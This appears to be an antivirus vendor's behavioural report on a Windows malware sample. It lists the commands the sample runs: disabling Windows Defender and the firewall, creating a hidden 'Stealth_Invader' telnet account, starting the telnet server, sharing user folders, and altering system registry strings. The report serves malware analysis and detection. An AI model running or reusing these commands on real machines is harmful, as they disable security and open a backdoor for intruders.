Technical Information
To ensure autorun and distribution:
Creates the following services:
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\Messenger] 'Start' = '00000002'
Malicious functions:
Executes the following:
- '<SYSTEM32>\net1.exe' stop WerSvc
- '<SYSTEM32>\net.exe' stop WerSvc
- '<SYSTEM32>\net1.exe' share VistaUser="c:\users"
- '<SYSTEM32>\net1.exe' share User="C:\Documents and Settings"
- '<SYSTEM32>\sc.exe' config WerSvc start= disabled
- '<SYSTEM32>\sc.exe' config WinDefend start= disabled
- '<SYSTEM32>\net1.exe' stop SharedAccess
- '<SYSTEM32>\net1.exe' stop WinDefend
- '<SYSTEM32>\net.exe' stop WinDefend
- '<SYSTEM32>\net1.exe' user Guest active:no
- '<SYSTEM32>\net1.exe' localgroup TelnetClients Stealth_Invader /add
- '%WINDIR%\explorer.exe'
- '<SYSTEM32>\taskkill.exe' /f /im explorer.exe
- '<SYSTEM32>\net1.exe' localgroup TelnetClients /add /comment:"Telnet User Group"
- '<SYSTEM32>\net1.exe' user Stealth_Invader acc /add /comment:"Stealth Account"
- '<SYSTEM32>\net1.exe' share Windows=%WINDIR%
- '<SYSTEM32>\net1.exe' localgroup Users Stealth_Invader /delete
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s Stealth_Invader /add
- '<SYSTEM32>\net.exe' stop SharedAccess
- '<SYSTEM32>\reg.exe' add "hklm\hardware\description\system\centralprocessor\1" /v ProcessorNameString /t reg_sz /d "Intel(X) Core(TM) i7 Extreme 1333 @ 8.00Ghz" /f
- '<SYSTEM32>\reg.exe' add "hklm\hardware\description\system\centralprocessor\0" /v ProcessorNameString /t reg_sz /d "Intel(X) Core(TM) i7 Extreme 1333 @ 8.00Ghz" /f
- '<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows\currentversion\policies\system" /v legalnoticetext /t reg_sz /d "System Failure !" /f
- '<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows\currentversion\policies\system" /v legalnoticecaption /t reg_sz /d "Windows Security Alert" /f
- '<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows NT\currentversion" /v ProductName /t reg_sz /d "Cyber Molotov" /f
- '<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows NT\currentversion" /v RegisteredOwner /t reg_sz /d "=Stealth_Invader=" /f
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\READY TO WAR.BAT" "
- '<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows NT\currentversion" /v EditionID /t reg_sz /d "Cyber Molotov" /f
- '<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows NT\currentversion" /v RegisteredOrganization /t reg_sz /d "ACC Development" /f
- '<SYSTEM32>\tlntsvr.exe'
- '<SYSTEM32>\net1.exe' start telnet
- '<SYSTEM32>\sc.exe' config SharedAccess start= disabled
- '<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
- '<SYSTEM32>\sc.exe' config tlntsvr start= auto
- '<SYSTEM32>\reg.exe' add HKLM\Software\Policies\Microsoft\WindowsFirewall\StandardProfile /v EnableFirewall /t reg_dword /d 0 /f
- '<SYSTEM32>\reg.exe' add HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v EnableFirewall /t reg_dword /d 0 /f
- '<SYSTEM32>\net1.exe' start messenger
- '<SYSTEM32>\sc.exe' config messenger start= auto
Terminates or attempts to terminate
the following system processes:
- %WINDIR%\Explorer.EXE
Modifies file system :
Creates the following files:
- %TEMP%\1.tmp\READY TO WAR.BAT
Deletes the following files:
- %TEMP%\1.tmp\READY TO WAR.BAT
Miscellaneous:
Searches for the following windows:
- ClassName: 'OleMainThreadWndClass' WindowName: '(null)'
- ClassName: 'SysListView32' WindowName: '(null)'
- ClassName: 'CSCHiddenWindow' WindowName: '(null)'
- ClassName: 'SystemTray_Main' WindowName: '(null)'
- ClassName: 'Proxy Desktop' WindowName: '(null)'
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'BaseBar' WindowName: 'ChanApp'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'